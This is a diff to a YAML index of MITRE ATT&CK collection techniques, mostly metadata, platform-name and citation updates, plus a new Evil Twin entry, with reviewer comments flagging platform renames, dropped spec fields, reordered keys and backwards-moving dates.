T1560.001:
@@ -39484,7 +39961,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39541,7 +40017,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39635,7 +40110,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39714,7 +40188,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39753,7 +40226,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39768,30 +40241,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39800,13 +40253,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39820,20 +40277,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
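Review bot: `x_mitre_platforms` for T1213.002 changes from `Office 365` to `Office Suite`, and a new data source `'Cloud Service: Cloud Service Metadata'` is added; the platform rename matters more than the diff size suggests, because anything that buckets techniques by the platform string (per-platform indexes, filters matching on `Office 365`) will silently drop this technique until it is taught the new name. Check that index generation in this same change routes `Office Suite` to wherever `Office 365` used to go, and decide whether an alias for the old name is needed for compatibility. The `x_mitre_version: '1.0'` → `'1.1'` bump and the `Arun Seelagan, CISA` contributor line are consistent with an upstream content update.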
@@ -39876,7 +40350,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39901,7 +40374,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39921,22 +40394,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
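Review bot: T1560.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with no replacement `x_mitre_attack_spec_version` visible, whereas the objects regenerated in full elsewhere in the patch (T1114 directly below, T1025, T1074.001) end up with `x_mitre_attack_spec_version: 3.2.0`. Worth confirming the field still appears elsewhere in the T1560.003 object; if it is genuinely gone, the object no longer records which ATT&CK spec version it conforms to. The extended T1114 description and the new CISA / TrustedSec citation keys read correctly and match the references added further down.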
@@ -39953,11 +40428,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
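Review bot: replacing the `Office 365` and `Google Workspace` platform values with the single `Office Suite` value (with the version bump from 2.5 to 2.6) changes the strings any platform-filtered view of this index matches on, so a consumer that selects techniques by the literal old platform names will silently stop returning T1114. Regenerate or update those consumers in the same change and call the rename out in the commit message, since the same substitution is applied to T1119 and T1530 further down.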
@@ -39973,37 +40447,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -40015,75 +40480,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
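Review bot: most of the churn in this hunk is key reordering rather than content: for T1025 and T1074.001 the `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `external_references` and `type` / `id` / `created` blocks are deleted from the top of each object and re-emitted lower down with identical values, which buries the substantive edits (the `modified` bumps, the added `revoked: false` and `x_mitre_deprecated: false`, and the Prevailion reference moving to a `web.archive.org` snapshot). If the generator can emit keys in a stable order, future regenerations would be reviewable by eye; switching the Prevailion citation to an archived copy is fine as is.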
@@ -40110,7 +40593,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40134,13 +40617,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -40161,6 +40642,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -40184,8 +40666,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -40210,7 +40694,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -40277,12 +40760,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40316,10 +40798,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -40330,13 +40814,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40377,9 +40862,6 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests:
- name: Azure - Enumerate Azure Blobs with MicroBurst
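Review bot: the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines removed from the end of T1530 here are not dropped but moved up into the alphabetical run of `x_mitre_*` keys in the two preceding hunks, while T1025, T1074.001 and T1074.002 in this same patch keep them at the end of the object after `object_marking_refs`. Two key orderings in one generated file usually means two serialization paths; worth checking the generator so the layout is uniform and the next regeneration does not shuffle these lines again.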
@@ -40477,30 +40959,7 @@ collection:
name: powershell
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40511,23 +40970,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
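Review bot: the Mandiant M-Trends 2020 reference now points at `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` but still reads `Retrieved April 24, 2020`, a date that predates the `2021-09` segment of the new URL, so the citation cannot have been retrieved from that location on that date. The DHCP Spoofing hunk further down updates the retrieval date together with its replacement URL; do the same here. The `modified` value for T1005 in this hunk also moves backwards (`2023-05-09` to `2023-04-12`), the same pattern seen on other objects in this patch, and should be covered by the same explanation in the commit message.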
@@ -40597,7 +41080,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -40632,7 +41114,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40651,10 +41133,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
